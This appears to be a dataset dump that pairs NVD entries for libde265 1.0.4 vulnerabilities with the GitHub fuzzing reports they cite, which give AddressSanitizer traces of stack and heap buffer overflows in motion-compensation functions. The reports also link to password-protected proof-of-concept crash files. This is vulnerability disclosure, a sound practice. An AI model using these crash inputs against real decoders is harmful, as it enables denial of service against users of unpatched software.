[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/241
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# stack-buffer-overflow in put_qpel_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_qpel_fallback-stack_overflow.crash WARNING: pps header invalid WARNING: CTB outside of image area (concealing stream error...) WARNING: pps header invalid WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: pps header invalid WARNING: end_of_sub_stream_one_bit not set to 1 when it should be ================================================================= ==91107==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffebaa90b7f at pc 0x00000043836d bp 0x7ffebaa8e510 sp 0x7ffebaa8e500 READ of size 2 at 0x7ffebaa90b7f thread T0 #0 0x43836c in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:520 #1 0x433c33 in put_qpel_1_3_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) /root/src/libde265/libde265/fallback-motion.cc:646 #2 0x52c405 in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const ../libde265/acceleration.h:338 #3 0x52d7d6 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:156 #4 0x51f6f2 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:376 #5 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #6 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #7 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #8 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #9 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #10 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #11 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #12 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #13 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #14 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #15 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #16 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #17 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #18 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #19 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #20 0x7fd98d83582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #21 0x402b28 in _start (/root/dec265+0x402b28) Address 0x7ffebaa90b7f is located in stack of thread T0 at offset 9151 in frame #0 0x52cf34 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:49 This frame has 2 object(s): [32, 9120) 'mcbuffer' [9152, 14832) 'padbuf' <== Memory access at offset 9151 partially underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:520 void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int) Shadow bytes around the buggy address: 0x10005754a110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a140: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a150: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10005754a160: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2[f2] 0x10005754a170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a1a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10005754a1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==91107==ABORTING ``` ## POC file [libde265-put_qpel_fallback-stack_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_qpel_fallback-stack_overflow.zip) [libde265-put_qpel_fallback-stack_overflow2.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_qpel_fallback-stack_overflow2.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
stack-buffer-overflow in put_qpel_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/241/comments
3
2019-12-24T11:32:05Z
2023-01-24T18:08:34Z
https://github.com/strukturag/libde265/issues/241
542,100,005
241
2,502
CVE-2020-21602
2021-09-16T22:15:08.007
libde265 v1.0.4 contains a heap buffer overflow in the put_weighted_bipred_16_fallback function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/242" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/242" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/242
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in put_weighted_bipred_16_fallback when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_weighted_bipred_16_fallback-heap_overflow.crash WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: pps header invalid WARNING: end_of_sub_stream_one_bit not set to 1 when it should be ================================================================= ==97574==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62b00001b510 at pc 0x000000432ac8 bp 0x7ffe6664b0a0 sp 0x7ffe6664b090 WRITE of size 2 at 0x62b00001b510 thread T0 #0 0x432ac7 in put_weighted_bipred_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/fallback-motion.cc:223 #1 0x52beeb in acceleration_functions::put_weighted_bipred(void*, long, short const*, short const*, long, int, int, int, int, int, int, int, int) const ../libde265/acceleration.h:286 #2 0x52112f in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:562 #3 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #4 0x47995d in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4310 #5 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #6 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #7 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #8 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #9 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #10 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #11 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #12 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #13 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #14 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #15 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #16 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #17 0x7f349865a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #18 0x402b28 in _start (/root/dec265+0x402b28) 0x62b00001b510 is located 0 bytes to the right of 25360-byte region [0x62b000015200,0x62b00001b510) allocated by thread T0 here: #0 0x7f349955b076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e725 in de265_image_get_buffer /root/src/libde265/libde265/image.cc:132 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x414467 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2012 #6 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #7 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #8 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #9 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #10 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #11 0x7f349865a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:223 put_weighted_bipred_16_fallback(unsigned short*, long, short const*, short const*, long, int, int, int, int, int, int, int, int) Shadow bytes around the buggy address: 0x0c567fffb650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c567fffb690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c567fffb6a0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c567fffb6f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==97574==ABORTING ``` ## POC file [libde265-put_weighted_bipred_16_fallback-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_weighted_bipred_16_fallback-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_weighted_bipred_16_fallback when decoding file
https://api.github.com/repos/strukturag/libde265/issues/242/comments
2
2019-12-24T11:33:52Z
2023-01-24T18:09:22Z
https://github.com/strukturag/libde265/issues/242
542,100,475
242
2,503
CVE-2020-21603
2021-09-16T22:15:08.050
libde265 v1.0.4 contains a heap buffer overflow in the put_qpel_0_0_fallback_16 function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/240" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/240" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/240
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
# heap-buffer-overflow in put_qpel_0_0_fallback_16 when decoding file I found some problems during fuzzing ## Test Version dev version, git clone https://github.com/strukturag/libde265 ## Test Environment root@ubuntu:~# lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 16.04.6 LTS Release: 16.04 Codename: xenial root@ubuntu:~# uname -a Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux ## Test Configure ./configure configure: --------------------------------------- configure: Building dec265 example: yes configure: Building sherlock265 example: no configure: Building encoder: yes configure: --------------------------------------- ## Test Program `dec265 [infile]` ## Asan Output ``` root@ubuntu:~# ./dec265 libde265-put_qpel_0_0_fallback_16-heap_overflow.crash WARNING: non-existing PPS referenced WARNING: pps header invalid WARNING: non-existing PPS referenced WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid WARNING: faulty reference picture list WARNING: faulty reference picture list WARNING: slice header invalid WARNING: end_of_sub_stream_one_bit not set to 1 when it should be WARNING: slice header invalid WARNING: slice header invalid WARNING: faulty reference picture list WARNING: coded parameter out of range WARNING: CTB outside of image area (concealing stream error...) ================================================================= ==87307==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x633000131410 at pc 0x0000004334a0 bp 0x7ffc47b87000 sp 0x7ffc47b86ff0 READ of size 2 at 0x633000131410 thread T0 #0 0x43349f in put_qpel_0_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) /root/src/libde265/libde265/fallback-motion.cc:471 #1 0x52c405 in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const ../libde265/acceleration.h:338 #2 0x52d20c in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) /root/src/libde265/libde265/motion.cc:78 #3 0x51f6f2 in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) /root/src/libde265/libde265/motion.cc:376 #4 0x52b8f9 in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/motion.cc:2107 #5 0x478f4a in read_prediction_unit(thread_context*, int, int, int, int, int, int, int, int, int) /root/src/libde265/libde265/slice.cc:4137 #6 0x47a704 in read_coding_unit(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4492 #7 0x47b6fe in read_coding_quadtree(thread_context*, int, int, int, int) /root/src/libde265/libde265/slice.cc:4647 #8 0x47338a in read_coding_tree_unit(thread_context*) /root/src/libde265/libde265/slice.cc:2861 #9 0x47beb1 in decode_substream(thread_context*, bool, bool) /root/src/libde265/libde265/slice.cc:4736 #10 0x47db9f in read_slice_segment_data(thread_context*) /root/src/libde265/libde265/slice.cc:5049 #11 0x40bf17 in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:843 #12 0x40c6d7 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) /root/src/libde265/libde265/decctx.cc:945 #13 0x40b589 in decoder_context::decode_some(bool*) /root/src/libde265/libde265/decctx.cc:730 #14 0x40b2f2 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:688 #15 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #16 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #17 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #18 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #19 0x7f3dfef4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #20 0x402b28 in _start (/root/dec265+0x402b28) 0x633000131410 is located 0 bytes to the right of 101392-byte region [0x633000118800,0x633000131410) allocated by thread T0 here: #0 0x7f3dffe4a076 in __interceptor_posix_memalign (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99076) #1 0x43e00d in ALLOC_ALIGNED /root/src/libde265/libde265/image.cc:54 #2 0x43e6da in de265_image_get_buffer /root/src/libde265/libde265/image.cc:128 #3 0x440639 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) /root/src/libde265/libde265/image.cc:384 #4 0x43afa4 in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) /root/src/libde265/libde265/dpb.cc:262 #5 0x40ee8b in decoder_context::generate_unavailable_reference_picture(seq_parameter_set const*, int, bool) /root/src/libde265/libde265/decctx.cc:1418 #6 0x411722 in decoder_context::process_reference_picture_set(slice_segment_header*) /root/src/libde265/libde265/decctx.cc:1648 #7 0x414cc9 in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) /root/src/libde265/libde265/decctx.cc:2066 #8 0x40acad in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) /root/src/libde265/libde265/decctx.cc:639 #9 0x40dbb3 in decoder_context::decode_NAL(NAL_unit*) /root/src/libde265/libde265/decctx.cc:1230 #10 0x40e17b in decoder_context::decode(int*) /root/src/libde265/libde265/decctx.cc:1318 #11 0x405a61 in de265_decode /root/src/libde265/libde265/de265.cc:346 #12 0x404972 in main /root/src/libde265/dec265/dec265.cc:764 #13 0x7f3dfef4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/src/libde265/libde265/fallback-motion.cc:471 put_qpel_0_0_fallback_16(short*, long, unsigned short const*, long, int, int, short*, int) Shadow bytes around the buggy address: 0x0c668001e230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c668001e240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c668001e250: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c668001e260: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c668001e270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c668001e280: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c668001e290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c668001e2a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c668001e2b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c668001e2c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c668001e2d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==87307==ABORTING ``` ## POC file [libde265-put_qpel_0_0_fallback_16-heap_overflow.zip](https://github.com/leonzhao7/vulnerability/blob/master/libde265-put_qpel_0_0_fallback_16-heap_overflow.zip) password: leon.zhao.7 ## CREDIT Zhao Liang, Huawei Weiran Labs
heap-buffer-overflow in put_qpel_0_0_fallback_16 when decoding file
https://api.github.com/repos/strukturag/libde265/issues/240/comments
3
2019-12-24T11:29:40Z
2023-01-24T18:07:17Z
https://github.com/strukturag/libde265/issues/240
542,099,323
240
2,504
CVE-2020-21604
2021-09-16T22:15:08.093
libde265 v1.0.4 contains a heap buffer overflow fault in the _mm_loadl_epi64 function, which can be exploited via a crafted a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/231" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/strukturag/libde265/issues/231" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "4F5331C0-3C70-42CB-AC2C-4E8B7FA1328F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/strukturag/libde265/issues/231
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "strukturag", "libde265" ]
